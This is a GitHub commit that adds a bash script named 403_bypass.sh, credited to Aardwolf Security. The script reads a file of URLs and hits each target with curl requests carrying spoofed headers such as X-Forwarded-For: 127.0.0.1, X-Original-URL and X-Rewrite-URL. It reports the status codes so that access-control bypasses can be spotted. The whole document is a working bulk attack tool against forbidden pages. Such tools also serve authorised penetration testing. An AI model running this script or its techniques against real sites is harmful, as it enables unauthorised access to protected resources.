STRLCPY/Bulk_403_Bypass

Create 403_bypass.sh
Aardwolf Security Ltd committed with GitHub 1 year ago

d0d20c62

Total 1 files

■ ■ ■ ■ ■ ■

403_bypass.sh

1	+	#!/bin/bash
2	+
3	+	figlet Bulk 403 Bypass
4	+	echo " By Aardwolf Security"
5	+
6	+	# Check if input file is provided
7	+	if [ $# -eq 0 ]
8	+	then
9	+	echo "Usage: $0 input_file"
10	+	exit 1
11	+	fi
12	+
13	+	# Loop through the URLs in the input file
14	+	while read url
15	+	do
16	+	# Test for known 403 bypasses
17	+	echo "Testing: $url"
18	+	curl -s -o /dev/null -w "X-Custom-IP-Authorization: 127.0.0.1 - %{http_code}\n" -H "X-Custom-IP-Authorization: 127.0.0.1" --max-time 5 $url
19	+	curl -s -o /dev/null -w "X-Original-URL: $url - %{http_code}\n" -H "X-Original-URL: $url" --max-time 5 $url
20	+	curl -s -o /dev/null -w "X-Rewrite-URL: $url - %{http_code}\n" -H "X-Rewrite-URL: $url" --max-time 5 $url
21	+	curl -s -o /dev/null -w "Referer: $url - %{http_code}\n" -H "Referer: $url" --max-time 5 $url
22	+	curl -s -o /dev/null -w "X-Originating-IP: 127.0.0.1 - %{http_code}\n" -H "X-Originating-IP: 127.0.0.1" --max-time 5 $url
23	+	curl -s -o /dev/null -w "X-Forwarded-For: 127.0.0.1 - %{http_code}\n" -H "X-Forwarded-For: 127.0.0.1" --max-time 5 $url
24	+	curl -s -o /dev/null -w "X-Forwarded-Host: $url - %{http_code}\n" -H "X-Forwarded-Host: $url" --max-time 5 $url
25	+	curl -s -o /dev/null -w "X-Forwarded-Server: $url - %{http_code}\n" -H "X-Forwarded-Server: $url" --max-time 5 $url
26	+	curl -s -o /dev/null -w "X-Host: $url - %{http_code}\n" -H "X-Host: $url" --max-time 5 $url
27	+	curl -s -o /dev/null -w "X-HTTP-Host-Override: $url - %{http_code}\n" -H "X-HTTP-Host-Override: $url" --max-time 5 $url
28	+	curl -s -o /dev/null -w "X-Original-URL: /$((RANDOM%100000)) - %{http_code}\n" -H "X-Original-URL: /$((RANDOM%100000))" --max-time 5 $url
29	+	echo "----------------------"
30	+
31	+	done < $1
32	+

Create 403_bypass.sh